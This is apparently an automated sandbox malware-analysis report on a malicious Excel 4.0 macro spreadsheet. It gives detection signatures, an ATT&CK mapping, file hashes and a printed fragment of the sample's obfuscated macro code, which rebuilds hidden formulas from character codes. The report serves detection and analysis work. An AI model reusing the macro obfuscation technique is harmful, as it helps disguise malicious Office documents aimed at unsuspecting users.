Analysis Report gv090x.xls
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth | |
 | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
System Summary: |
---|
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Window title found: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Hooking and other Techniques for Hiding and Protection: |
---|
Hides that the sample has been downloaded from the Internet (zone.identifier) |
Source: | File opened: |
Source: | Process information set: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting11 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Hidden Files and Directories1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356769 |
Start date: | 23.02.2021 |
Start time: | 16:23:13 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | gv090x.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.evad.winXLS@1/5@0/0 |
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 13922 |
Entropy (8bit): | 7.264421482311856 |
Encrypted: | false |
SSDEEP: | 384:hWmKH0IZVbKyachOSbQFnzaOX4boStjOiByI6b+7Cpbtcm70n:hWmQZVbKh4OPFzUVtxD64mwn |
MD5: | 93E4FCE088F41BBBEA379B5F0318513C |
SHA1: | 7B9C43B231A71E242C09E65C222359183D501526 |
SHA-256: | E818F316C5B07912DE21FF20813EF05A3AA92460563A9C1862EFF88DADC91D4E |
SHA-512: | E958D14F481E42C7DF181B83055CB10FB451B73D06776915D8BF068BC44122F2910E8FE681D4D0EE4BE2E9E243960BDA9111E02C38037FDE454C09D3E4CDCDE4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.476558463095134 |
Encrypted: | false |
SSDEEP: | 12:85QJ7RikLgXg/XAlCPCHaX2B8GB/YjxX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdJU:85sL/XTm6G0YefDv3qXqrNru/ |
MD5: | 8DBAD16D3CE185637239DD2B7306B309 |
SHA1: | 20DE769A3883F615AD99C6D40C39A37CC75337A6 |
SHA-256: | 662AC8A55B06F2EE00D386DB045337C1113ADD1E30D49730F4E66FFFC3F20DF7 |
SHA-512: | 27765EBD152367CEC106DA087580DCC254BE99CD5A6227143D393D83F5E0D3DB1E36D86DC312BA459B3D113D5E27ECDA3FF2E5CCDEFDEC7C2F11086B2E5BC966 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 1984 |
Entropy (8bit): | 4.4817661661631965 |
Encrypted: | false |
SSDEEP: | 24:83rk/XTm6GreVmVeMDv3qXqdM7dD23rk/XTm6GreVmVeMDv3qXqdM7dV:8Q/XTFGqYVKaQh2Q/XTFGqYVKaQ/ |
MD5: | 92FD3A9834599730DBAEF0FB99654045 |
SHA1: | 26B7394B203AB0AE8EB3CAE68057F393EBB863D5 |
SHA-256: | 4D929FAB468679E61C893EC2C33E73B397AFA8D4B9F77C0DC4DA57FB465CDC03 |
SHA-512: | 7008347ADFFC21244DFDE3F3C1BE60487EE5C4E5655861816ED43C3DA224648B63ADA025E980EC6AD15737C4A8E304239FE5E2B7509152179828B5F31A9A070F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 71 |
Entropy (8bit): | 4.165690479495976 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMzdpSaiVdpSmMzdpSv:dj6zdpeVdpEzdpc |
MD5: | E1ED9A88D8B36363A9E7BBA69AE5AA4F |
SHA1: | BAC0417433EE707A3F87DF6E960A9DBAA75D1C07 |
SHA-256: | FCF999F4FCEFEE407768E2917112D5BDF397D36BD798A991FE389FBDEB358502 |
SHA-512: | DA3E6EDCAB1051D76EE32047F5ED872E5673B3027761DB6FCF5E4D71E48E58F2D0ACF2AA3B3DFC1D9E56438FB5B8FD4FDD76BC3A122E0216AC21D2348E944F87 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45276 |
Entropy (8bit): | 5.099879850977744 |
Encrypted: | false |
SSDEEP: | 768:jjzi1PEYD/gM+3zdChRhohQMytjzi1pEYD/gM+s:/ziWooMZhAhQMezi0ooM9 |
MD5: | 9B9F375BE30EDD88E7554B2DC2F9FBBB |
SHA1: | 00081E5FCF06279CCC848EFA692C8B529968AF4B |
SHA-256: | 788249CD3BC4A18E34B68A959DCF122D76F8998B9484A757F05DC7B11776E012 |
SHA-512: | B6F88FFA3D01BE995250FF8030B7F2E39E712C5ACD7B63CBB5C1D579BE247FE647B0488C516BE7F4354F7883D1778098032C9014AF7652C94CE1B0B9D8787B17 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 4.199825067166816 |
TrID: |
|
File name: | gv090x.xls |
File size: | 36352 |
MD5: | 3ccb3ad55fdf18c9da2d3a6d3c64a1f1 |
SHA1: | e331cc1d0e38423264fc8f608d33980c0963cfc2 |
SHA256: | bbcf27717c056b3116002ea450057538f07592e9065a34e1ee61c364a6d8338d |
SHA512: | c665db0cb7a8a91611ea1596268d1dae282e49e06be78fc76de736dafa0d7faca8ef0a6804a120728c111f9da0001e2d78d325ac59b6cba5ce0b01eb3ac5d666 |
SSDEEP: | 384:hgC/9zi1xvqYc8YDknUgMB1WiS9ytS3hQI5SChQMy5v:pzi18EYD/gMjShR5ThQMyF |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "gv090x.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2021-02-22 11:17:45 |
Last Saved Time: | 2021-02-22 11:19:00 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.336728312671 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.290384763425 |
Base64 Encoded: | False |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 26461 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 26461 |
Entropy: | 5.15083338147 |
Base64 Encoded: | True |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,=GO,minu,gener,sta,assis,=WHI,disc,minu,unava,hid,solv,=WH,solve,sam,geral,cance,monro,injur,disc,gener,=NEXT,sch,=FOR,ant,=NE,=RET,nur,mem,mic,anti,int,=nu,,,,,,,,,,,,,,TO(,tes,ati,nford,tance,LE(,over,tes=,ilabl,den=L,e=0,ILE(s,=so,ple,d=COD,r=M,e=IN,ed=C,over=,ating,(),olar,MULA(,iqu,XT(),URN,se=R,orab,hel=,que,erfa,rse(,,,,,,,,,,,,,,R143C,=0,ng=0,=ROWS,=ROW,minut,"=""""",min,e=I,EN(un,xHcbSdhJXVO,olve,lve+1,s=MID,E(sa,OD(,DEX,HAR(,disco,=gene,xHcbSdhJXVO,shi,disc,e=an,xHcbSdhJXVO,(),118C,ili,R85C,=14,ces=,),,,,,,,,,,,,,,2),xHcbSdhJXVO,xHcbSdhJXVO,(me,S(m,es<s,xHcbSdhJXVO,ute,NDE,avail,,<hidd,xHcbSdhJXVO,(unav,mples,gen,(mich,MOD(g,ver&i,rati,,ps=A,"over,",tiqu,,xHcbSdhJXVO,2,a=Sh,14:R,9,2,xHcbSdhJXVO,,,,,,,,,,,,,,xHcbSdhJXVO,,,mora,ichel,tan,,s+1,X(mem,able,,en),,ail,)-3,era,"el,c",erald,nju,ng+,,DDRE,schol,e+1,,,xHcbSdhJXVO,eet1,94C14,xHcbSdhJXVO,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,bilia,),for,,xHcbSdhJXVO,ora,),,xHcbSdhJXVO,,able,2,tin,anc,-monr,red,1,,SS(,ars,xHcbSdhJXVO,,,,!R64C,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,),xHcbSdhJXVO,d),,,bilia,xHcbSdhJXVO,,,,",sol",xHcbSdhJXVO,"g,ass",er),"oe,9",xHcbSdhJXVO,xHcbSdhJXVO,,ant,hip,,,,,6:R,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,xHcbSdhJXVO,,,",minu",,,,,"ve,1",,istan,xHcbSdhJXVO,4)+3,,,,"ique,",s),,,,,79C6,,,,,,,,,,,,,,,,,,,,,,,,,,tes),,,,,),,ce)+,,2),,,,inte,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,1,,xHcbSdhJXVO,,,,rface,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,"s,,FA",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"LSE,",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""scr",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ipti,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"ng""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"residence=(VALUE(""0""))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(residence<32),,,,,,,,,,,,122,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,120,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,116,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=-1,,,,,,,,,,,,98,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,109,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,112,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,129,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,residence=residence+1,,,,,,,,,,,,124,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"operated=""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(reducing<213),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SUM(-795,729)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=MAX(-899,-28)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=reducing+1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=INDIRECT(ADDRESS(reducing+45,15+residence))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=IF($B$104=""xHcbSdhJXVO"",SET.NAME(""reducing"",213),SET.NAME(""op
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
System Behavior |
---|
General |
---|
Start time: | 16:23:38 |
Start date: | 23/02/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f9a0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|